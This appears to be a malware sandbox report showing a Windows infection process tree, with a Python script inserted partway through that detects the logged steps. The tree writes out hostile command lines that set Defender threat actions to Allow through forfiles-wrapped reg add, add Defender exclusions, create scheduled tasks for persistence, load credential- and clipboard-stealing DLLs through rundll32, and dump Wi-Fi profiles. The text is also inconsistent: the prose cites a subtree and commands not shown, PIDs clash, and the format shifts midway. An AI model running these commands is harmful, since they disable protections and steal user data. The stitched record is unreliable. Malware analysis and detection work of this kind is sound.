C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3984 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:1900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\341999741358_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵PID:4248
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748 -
C:\Users\Admin\Pictures\GWyWImjPJrYl6admmUmbQ0no.exe"C:\Users\Admin\Pictures\GWyWImjPJrYl6admmUmbQ0no.exe"4⤵
- Executes dropped EXE
PID:4180 -
C:\Users\Admin\Pictures\3gDOeUlDsghAqoZiZwcsvUk8.exe"C:\Users\Admin\Pictures\3gDOeUlDsghAqoZiZwcsvUk8.exe"4⤵
- Executes dropped EXE
PID:3916 -
C:\Users\Admin\Pictures\AFKn6lGaqzeckkfrsADTscxf.exe"C:\Users\Admin\Pictures\AFKn6lGaqzeckkfrsADTscxf.exe"4⤵
- Executes dropped EXE
PID:5032 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe"C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:2088 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exeC:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f51e1d0,0x6f51e1dc,0x6f51e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YtVJ0C8eA764GvOCeDcLOEZg.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\YtVJ0C8eA764GvOCeDcLOEZg.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2296 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe"C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2088 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240429115429" --session-guid=77eaa7be-3765-456f-a6fc-0cc9a32a7783 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2C040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:2916 -
C:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exeC:\Users\Admin\Pictures\YtVJ0C8eA764GvOCeDcLOEZg.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6eb9e1d0,0x6eb9e1dc,0x6eb9e1e86⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2148 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3744 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291154291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xfe6038,0xfe6044,0xfe60506⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\Pictures\VMfqgcBmOfC7mvnEpVVoTO7Y.exe"C:\Users\Admin\Pictures\VMfqgcBmOfC7mvnEpVVoTO7Y.exe"4⤵
- Executes dropped EXE
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1728
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵PID:2344
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:3944
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:2172
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵PID:3480
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:3580
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:3952
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵PID:1764
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:3120
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:4196
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵PID:880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:960
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:2320
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:1432
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵PID:3984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵PID:4688
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:1904
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:72
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 11:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe\" Wt /LmNdidrjZR 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2120 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵PID:1076
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵PID:2708
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵PID:4872
-
C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe"C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe"4⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:2368
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2316 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:2060
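The chrosha.exe subtree above contains the sample's defence-evasion and persistence command lines in one place: reg add of Windows Defender ThreatIDDefaultAction values to 6 (Allow, per the documented Set-MpPreference action codes), Defender exclusions via Add-MpPreference and the MSFT_MpPreference WMI class, schtasks entries pointing into %AppData% and %Temp% (one named explorer and one run as SYSTEM), rundll32 loading cred64.dll from %AppData%, forfiles used as a proxy launcher, and a choice-delayed Del. The Python below is an added example, not the sandbox's own logic, that turns those observations into command-line detections and runs them over events copied from the tree. The tag names, the USER_WRITABLE root list and the MASQUERADE_NAMES list are assumptions made for the example; the threat IDs are Defender-internal identifiers the report does not name.

```python
"""Command-line detections for the evasion and persistence steps in the
chrosha.exe subtree: Defender threat-action and exclusion tampering, scheduled
tasks into user-writable paths, rundll32 loading a DLL from %AppData%, forfiles
used as a proxy launcher, and a choice-delayed Del.

Added example for this report, not the sandbox's own logic. EVENTS are
(pid, command line) pairs copied from the process tree. Tag names,
USER_WRITABLE and MASQUERADE_NAMES are assumptions made for the example.
"""
import re

# Set-MpPreference ThreatIDDefaultAction_Actions codes as documented by Microsoft.
THREAT_ACTION = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                 "8": "UserDefined", "9": "NoAction", "10": "Block"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Public|ProgramData)\\", re.I)   # assumption
MASQUERADE_NAMES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe"}  # assumption

# Matches the plain form, the \"-escaped form nested in forfiles/cmd, and /reg:32|64 variants.
THREAT_RE = re.compile(
    r'ThreatIDDefaultAction\\?"?\s+/f\s+/v\s+\\?"?(\d+)\\?"?\s+/t\s+REG_SZ\s+/d\s+(\d+)', re.I)
EXCL_PS_RE = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+['\"]?([^'\"\s]+)", re.I)
EXCL_WMI_RE = re.compile(r"MSFT_MpPreference\s+call\s+Add\s+Exclusion(Extension|Path|Process)=(\S+)", re.I)
SCHTASKS_RE = re.compile(r'\bschtasks(?:\.exe)?"?\s+.*?/create\b', re.I)
TASK_TR_RE = re.compile(r"/tr\s+(.+?)(?=\s+/\w+|$)", re.I)
TASK_OPT_RE = re.compile(r'/(tn|sc|mo|ru|rl)\s+"?([^"\s]+)', re.I)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)"?\s*,\s*(\w+)', re.I)
FORFILES_RE = re.compile(r'\bforfiles(?:\.exe)?"?\s+.*?/c\s+"?(cmd|powershell)\b', re.I)
DELAYED_DEL_RE = re.compile(r"\bchoice\b.*?/T\s+\d+.*?&\s*(del\b.*)$", re.I)

EVENTS = [  # (pid, command line) copied from the process tree above
    (2172, r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6'),
    (2344, r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"'),
    (2424, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force'),
    (2216, r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True'),
    (2176, r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"'),
    (2120, r'schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 11:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe\" Wt /LmNdidrjZR 385118 /S" /V1 /F'),
    (3984, r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main'),
    (4448, r'"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"'),
    (1900, r"netsh wlan show profiles"),  # benign-looking control line, should yield no tags
]


def classify(cmdline):
    """Return a list of (tag, detail) pairs for one command line."""
    hits = []
    for tid, code in THREAT_RE.findall(cmdline):
        tag = "defender_threat_allow" if code == "6" else "defender_threat_action"
        hits.append((tag, f"threat {tid} -> {THREAT_ACTION.get(code, code)}"))
    for kind, value in EXCL_PS_RE.findall(cmdline) + EXCL_WMI_RE.findall(cmdline):
        hits.append(("defender_exclusion", f"{kind}={value}"))
    if SCHTASKS_RE.search(cmdline):
        opts = {k.lower(): v for k, v in TASK_OPT_RE.findall(cmdline)}
        m = TASK_TR_RE.search(cmdline)
        target = m.group(1).strip('"\\ ') if m else ""
        exe = re.search(r'[^\\"]+\.exe', target, re.I)
        name = exe.group(0).lower() if exe else ""
        summary = (f"TN={opts.get('tn', '-')} SC={opts.get('sc', '-')} MO={opts.get('mo', '-')} "
                   f"RU={opts.get('ru', '-')} RL={opts.get('rl', '-')} -> {target}")
        if USER_WRITABLE.search(target):
            hits.append(("schtasks_user_writable", summary))
        if name in MASQUERADE_NAMES and "\\windows\\" not in target.lower():
            hits.append(("masquerade_system_name", name))
    m = RUNDLL_RE.search(cmdline)
    if m and USER_WRITABLE.search(m.group(1)):
        hits.append(("rundll32_user_dll", f"{m.group(1)}!{m.group(2)}"))
    m = FORFILES_RE.search(cmdline)
    if m:
        hits.append(("lolbin_proxy", f"forfiles -> {m.group(1).lower()}"))
    m = DELAYED_DEL_RE.search(cmdline)
    if m:
        hits.append(("delayed_delete", m.group(1)))
    return hits


def triage(events):
    """Map pid -> detections for a list of (pid, command line) events."""
    return {pid: classify(cmd) for pid, cmd in events}


if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        for tag, detail in hits:
            print(f"{pid}\t{tag}\t{detail}")
```

The same rules apply unchanged to Sysmon event ID 1 or Security 4688 command lines. The forfiles rule matters because the reg add itself is the payload: without unwrapping, a detection keyed on the parent image name sees only forfiles.exe and cmd.exe spawning reg.exe, which is why the threat-action rule matches the nested, escaped form as well as the direct one.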
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3496 -ip 34961⤵PID:5112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3068 -ip 30681⤵PID:2820
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2132 -ip 21321⤵PID:4816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSDD6B.tmp\Install.exe Wt /LmNdidrjZR 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1284 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3372
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:3160
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:920
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 | level 5 | PID 3480
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" | level 3 | PID 4768
-
C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 | level 4 | PID 560
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 | level 5 | PID 4448
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" | level 3 | PID 2844
-
C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 | level 4 | PID 1996
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 | level 5 | PID 2720
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" | level 3 | PID 3740
-
C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 | level 4 | PID 2536
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 | level 5 | PID 1196
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" | level 3 | PID 4404
-
C:\Windows\SysWOW64\cmd.exe | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force | level 4 | PID 4088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell start-process -WindowStyle Hidden gpupdate.exe /force | level 5 | PID 1152
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force | level 6 | PID 4888
-
